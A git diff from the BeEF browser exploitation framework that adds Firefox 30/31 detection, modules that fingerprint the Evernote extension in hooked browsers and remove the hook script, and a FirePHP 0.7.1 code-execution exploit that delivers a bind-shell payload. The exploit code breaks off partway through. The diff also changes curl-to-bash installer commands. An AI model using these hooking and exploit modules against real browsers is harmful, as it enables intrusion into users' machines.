diff --git a/INSTALL.txt b/INSTALL.txt
index 642103ae9..bc33a4efa 100644
--- a/INSTALL.txt
+++ b/INSTALL.txt
@@ -51,8 +51,8 @@ Installation
- XCode: provides the sqlite support BeEF needs
- Ruby 1.9
- To install RVM and Ruby 1.9.3 on Mac OS:
- $ bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) source ~/.bash_profile
+ To install RVM and Ruby 1.9.3 on Mac OS:
+ $ bash -s stable < <(curl -Ls https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) source ~/.bash_profile
$ rvm install 1.9.3-p484
$ rvm use 1.9.3
diff --git a/README b/README
index 3938d24ff..f37887cb7 100644
--- a/README
+++ b/README
@@ -48,7 +48,7 @@ __The following is for the impatient.__
For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
We also have a Wiki page at https://github.com/beefproject/beef/wiki/Installation
- $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
+ $ bash -s stable < <(curl -Ls https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
Usage
diff --git a/README.mkd b/README.mkd
index 62021dbe6..10d51addc 100644
--- a/README.mkd
+++ b/README.mkd
@@ -48,7 +48,7 @@ __The following is for the impatient.__
For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
We also have a Wiki page at https://github.com/beefproject/beef/wiki/Installation
- $ curl https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
+ $ curl -L https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
Usage
diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index af4e0a7dd..e5da7f047 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -333,12 +333,28 @@ beef.browser = {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && window.navigator.userAgent.match(/Firefox\/29./) != null;
},
+ /**
+ * Returns true if FF30
+ * @example: beef.browser.isFF30()
+ */
+ isFF30: function () {
+ return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && window.navigator.userAgent.match(/Firefox\/30./) != null;
+ },
+
+ /**
+ * Returns true if FF31
+ * @example: beef.browser.isFF31()
+ */
+ isFF31: function () {
+ return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && window.navigator.userAgent.match(/Firefox\/31./) != null;
+ },
+
/**
* Returns true if FF.
* @example: beef.browser.isFF()
*/
isFF: function () {
- return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24() || this.isFF25() || this.isFF26() || this.isFF27() || this.isFF28() || this.isFF29();
+ return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24() || this.isFF25() || this.isFF26() || this.isFF27() || this.isFF28() || this.isFF29() || this.isFF30() || this.isFF31();
},
/**
@@ -922,6 +938,8 @@ beef.browser = {
FF27: this.isFF27(), // Firefox 27
FF28: this.isFF28(), // Firefox 28
FF29: this.isFF29(), // Firefox 29
+ FF30: this.isFF30(), // Firefox 30
+ FF31: this.isFF31(), // Firefox 31
FF: this.isFF(), // Firefox any version
IE6: this.isIE6(), // Internet Explorer 6
@@ -1274,6 +1292,14 @@ beef.browser = {
return '29'
}
; // Firefox 29
+ if (this.isFF30()) {
+ return '30'
+ }
+ ; // Firefox 30
+ if (this.isFF31()) {
+ return '31'
+ }
+ ; // Firefox 31
if (this.isIE6()) {
return '6'
diff --git a/install-beef b/install-beef
index e24a85fa0..60f1448d1 100644
--- a/install-beef
+++ b/install-beef
@@ -41,7 +41,7 @@ fi
if [ "$OS" == "Darwin" ]; then
echo "Mac OSX Detected"
echo "Installing Ruby Version Manager (RVM) & Ruby 1.9.3.."
- bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer)
+ bash -s stable < <(curl -Ls https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer)
source ~/.bash_login
rvm install 1.9.3-p0 --with-gcc=clang
rvm use 1.9.3-p0
@@ -78,7 +78,7 @@ if [ "$Distro" == "Debian" ]; then
sudo apt-get install build-essential openssl libreadline6 libreadline6-dev zlib1g zlib1g-dev libssl-dev libyaml-dev libsqlite3-0 libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev autoconf libc6-dev libncurses5-dev automake libtool bison subversion
-curl -sk https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash
+curl -Lsk https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash
echo '[[ -s "$HOME/.rvm/scripts/rvm" ]] && . "$HOME/.rvm/scripts/rvm"' >> ~/.bashrc
diff --git a/liveCD/BeEFLive.sh b/liveCD/BeEFLive.sh
index 9a2fa45e4..04ec5993a 100644
--- a/liveCD/BeEFLive.sh
+++ b/liveCD/BeEFLive.sh
@@ -175,6 +175,14 @@ show_menu() {
sudo ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key -N ''
sudo ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key -N ''
echo ""
+ echo "Creating beef user..."
+ sudo useradd -d /home/beef -m beef
+ sudo adduser beef sudo
+ sudo chsh -s /bin/bash beef
+ sudo chown -R beef:beef /opt/beef/
+ sudo chown -R beef:beef /opt/metasploit-framework/
+ sudo chown -R beef:beef /opt/sqlmap/
+ echo ""
echo "Please provide a password for ssh user: beef"
sudo passwd beef
echo "ssh enabled"
diff --git a/modules/browser/detect_evernote_clipper/command.js b/modules/browser/detect_evernote_clipper/command.js
new file mode 100644
index 000000000..e27a44e3f
--- /dev/null
+++ b/modules/browser/detect_evernote_clipper/command.js
@@ -0,0 +1,34 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+ var result = "";
+
+ var s = document.createElement('script');
+ s.onload = function() {
+ result = "Detected through presense of extension content script.";
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "evernote_clipper="+result);
+ }
+ s.src = 'chrome-extension://pioclpoplcdbaefihamjohnefbikjilc/content/frame.js';
+ document.body.appendChild(s);
+
+ var evdiv = document.getElementById('evernoteGlobalTools');
+ if (typeof(evdiv) != 'undefined' && evdiv != null) {
+ // Evernote Web Clipper must have been active as well, because we can detect one of the iFrames
+ iframeresult = "Detected evernoteGlobalTools iFrame. Looks like the Web Clipper has been used on this page";
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "evernote_clipper="+iframeresult);
+ }
+
+
+ setTimeout(function() {
+ if (result == "") {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "evernote_clipper=Not Detected");
+ }
+ document.body.removeChild(s);
+ }, 2000);
+
+});
+
diff --git a/modules/browser/detect_evernote_clipper/config.yaml b/modules/browser/detect_evernote_clipper/config.yaml
new file mode 100644
index 000000000..ac9006872
--- /dev/null
+++ b/modules/browser/detect_evernote_clipper/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ detect_evernote_clipper:
+ enable: true
+ category: "Browser"
+ name: "Detect Evernote Web Clipper"
+ description: "This module checks if the Evernote Web Clipper extension is installed and active."
+ authors: ["xntrik"]
+ target:
+ not_working: ["IE"]
+ working: ["C"]
diff --git a/modules/browser/detect_evernote_clipper/module.rb b/modules/browser/detect_evernote_clipper/module.rb
new file mode 100644
index 000000000..1ec206ee3
--- /dev/null
+++ b/modules/browser/detect_evernote_clipper/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_evernote_clipper < BeEF::Core::Command
+
+ def post_execute
+ content = {}
+ content['evernote_clipper'] = @datastore['evernote_clipper'] if not @datastore['evernote_clipper'].nil?
+ save content
+ end
+
+end
diff --git a/modules/browser/hooked_domain/rickroll/command.js b/modules/browser/hooked_domain/rickroll/command.js
index b6c6b5465..f143d1056 100644
--- a/modules/browser/hooked_domain/rickroll/command.js
+++ b/modules/browser/hooked_domain/rickroll/command.js
@@ -9,8 +9,7 @@ beef.execute(function() {
$j('body').css({'padding':'0px', 'margin':'0px', 'height':'100%'});
$j('html').css({'padding':'0px', 'margin':'0px', 'height':'100%'});
-
- $j('body').html('');
-
+
+ $j('body').html('');
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Rickroll Successful");
});
diff --git a/modules/browser/remove_hook_element/command.js b/modules/browser/remove_hook_element/command.js
new file mode 100644
index 000000000..4fb39fe42
--- /dev/null
+++ b/modules/browser/remove_hook_element/command.js
@@ -0,0 +1,29 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ /**
+ * Removes the BeEF hook.js
+ * @return: true if the hook.js script is removed from the DOM
+ */
+ var removeHookElem = function() {
+ var removedFrames = $j('script[src*="'+beef.net.hook+'"]').remove();
+ if (removedFrames.length > 0) {
+ return true;
+ } else {
+ return false;
+ }
+ }
+
+ if (removeHookElem() == true) {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=successfully removed the hook script element");
+ } else {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=something did not work");
+ }
+
+});
+
diff --git a/modules/browser/remove_hook_element/config.yaml b/modules/browser/remove_hook_element/config.yaml
new file mode 100644
index 000000000..15a2b06dd
--- /dev/null
+++ b/modules/browser/remove_hook_element/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ remove_hook_element:
+ enable: true
+ category: "Browser"
+ name: "Remove Hook Element"
+ description: "This module removes the BeEF hook script element from the hooked page, but the underlying BeEF DOM object remains."
+ authors: ["xntrik"]
+ target:
+ working: ["All"]
diff --git a/modules/browser/remove_hook_element/module.rb b/modules/browser/remove_hook_element/module.rb
new file mode 100644
index 000000000..bd20f1f27
--- /dev/null
+++ b/modules/browser/remove_hook_element/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Remove_hook_element < BeEF::Core::Command
+
+ def post_execute
+ content = {}
+ content["result"] = @datastore["result"] if not @datastore["result"].nil?
+ save content
+ end
+
+end
diff --git a/modules/exploits/firephp/command.js b/modules/exploits/firephp/command.js
new file mode 100644
index 000000000..4272f9dd7
--- /dev/null
+++ b/modules/exploits/firephp/command.js
@@ -0,0 +1,26 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ // detect firebug
+ if (window.console && (window.console.firebug || window.console.exception)) {
+ var firephp_<%= @command_id %> = beef.dom.createInvisibleIframe();
+ firephp_<%= @command_id %>.src = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port + "/firephp";
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+ } else {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "error=Module did not run. Firebug is not open in the hooked browser.");
+ return;
+ }
+
+ // clean up
+ cleanup = function() {
+ document.body.removeChild(firephp_<%= @command_id %>);
+ }
+ setTimeout("cleanup()", 10000);
+
+});
+
diff --git a/modules/exploits/firephp/config.yaml b/modules/exploits/firephp/config.yaml
new file mode 100644
index 000000000..ba97cfdd7
--- /dev/null
+++ b/modules/exploits/firephp/config.yaml
@@ -0,0 +1,19 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+###
+# Exploit: http://www.justanotherhacker.com/advisories/jahx132.html
+###
+beef:
+ module:
+ firephp_code_exec:
+ enable: true
+ category: "Exploits"
+ name: "Firephp 0.7.1 RCE"
+ description: "Exploit FirePHP <= 0.7.1 to execute arbitrary JavaScript within the trusted 'chrome://' zone.
This module forces the browser to load '/firephp' on the BeEF server.
The payload is executed silently once the user moves the mouse over the array returned for 'http://[BeEF]/firephp' in Firebug.
Note: Use msfpayload to generate JavaScript payloads. The default payload binds a shell on port 4444.
See 'modules/exploits/firephp/payload.js'"
+ authors: ["Wireghoul", "bcoles"]
+ target:
+ user_notify: ["FF"]
+ not_working: ["All"]
diff --git a/modules/exploits/firephp/module.rb b/modules/exploits/firephp/module.rb
new file mode 100644
index 000000000..e5404974d
--- /dev/null
+++ b/modules/exploits/firephp/module.rb
@@ -0,0 +1,59 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+###
+# PoC by Wireghoul: http://www.justanotherhacker.com/advisories/jahx132.html
+###
+class Firephp_code_exec < BeEF::Core::Command
+
+ def pre_send
+ rand_str = rand(32**10).to_s(32)
+
+ # load payload.js file
+ # generate payload:
+ # msfpayload firefox/shell_bind_tcp LPORT=4444 R > payload.js
+ payload = ""
+ f = File.open("#{$root_dir}/modules/exploits/firephp/payload.js")
+ f.each_line do |line|
+ payload << line
+ end
+ f.close
+
+ # construct exploit+payload HTTP response
+ exploit = {
+ "RequestHeaders" => {
+ "1"=>"#{rand(10)}",
+ "2"=>"#{rand(10)}",
+ "3"=>"#{rand(10)}",
+ "4"=>"#{rand(10)}",
+ "5"=>"#{rand(10)}",
+ "6"=>"#{rand(10)}",
+ "7"=>"#{rand(10)}",
+ "8"=>"#{rand(10)}",
+ "9"=>"#{rand(10)}",
+ "
+
+
+